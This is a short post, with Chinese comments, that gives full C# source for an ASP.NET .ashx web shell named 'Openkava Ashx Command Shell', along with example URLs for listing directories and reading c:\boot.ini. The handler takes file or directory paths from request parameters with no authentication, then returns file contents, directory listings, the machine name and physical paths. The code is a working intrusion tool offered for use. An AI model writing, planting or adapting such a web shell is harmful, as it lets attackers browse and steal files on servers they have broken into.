具体用法
http://xxx.com/cmd.ashx?c=dir&c:\windows
http://xxx.com/cmd.ashx?c=show&c:\boot.ini
<% @ webhandler language="C#" class="Sbm.Web.ApplicationCenter.Cmd" %>
using System;
using System.Web.SessionState;
using System.Drawing;
using System.Drawing.Imaging;
using System.Text;
using System.IO;
using System.Configuration;
using System.Collections;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.HtmlControls;
namespace Sbm.Web.ApplicationCenter
{
public class Cmd:System.Web.IHttpHandler
{
bool IHttpHandler.IsReusable
{
get { return true; }
}
void IHttpHandler.ProcessRequest(HttpContext context)
{
System.Text.StringBuilder sb=new System.Text.StringBuilder();
context.Response.AddHeader("Prama","no-cache");
context.Response.CacheControl="private";
context.Response.Expires=0;
context.Response.ContentType="text/html";
//获取参数
string c=context.Request["c"]; //命令
string p=context.Request["p"]; //命令需要参数
if(c==null || p==null) context.Response.Close();
c=c.Trim().ToLower();
p=p.Trim().ToLower();
sb.Append("<html><head>Openkava Ashx Command Shell <br/><hr></head><body>");
//string path=Server.MapPath("dir.ashx");
sb.Append("系统参数:</br><hr>");
sb.Append(context.Server.MachineName+"<br>");
sb.Append("Physical path:"+context.Request.PhysicalApplicationPath +" <br/>");
sb.Append("virtual file path:"+context.Request.CurrentExecutionFilePath +" <br/>");
sb.Append("virtual root path:"+context.Request.ApplicationPath +" <br/>");
sb.Append("<hr><br>");
// context.Request.SaveAs("f:""request.txt",true);
//显示文件
if(c=="show")
{
StreamReader objReader = new StreamReader(p);
string sLine="";
while (sLine != null)
{
sLine = objReader.ReadLine();
if (sLine != null)
sb.Append(sLine+"<br>");
}
objReader.Close();
}
//显示目录
if(c=="dir" )
{
System.IO.DirectoryInfo d= new DirectoryInfo(p); //("f:""usr""cw3b058"); //
foreach (DirectoryInfo sub in d.GetDirectories())
{
sb.Append(sub.FullName+"""<br/>");
}
foreach (FileInfo File in d.GetFiles())
{
sb.Append(File.FullName+"<br/>");
}
}
sb.Append("<hr><br/>");
sb.Append("</body></html>");
context.Response.Output.Write(sb.ToString());
context.Response.Flush();
context.Response.Close();
}
}
}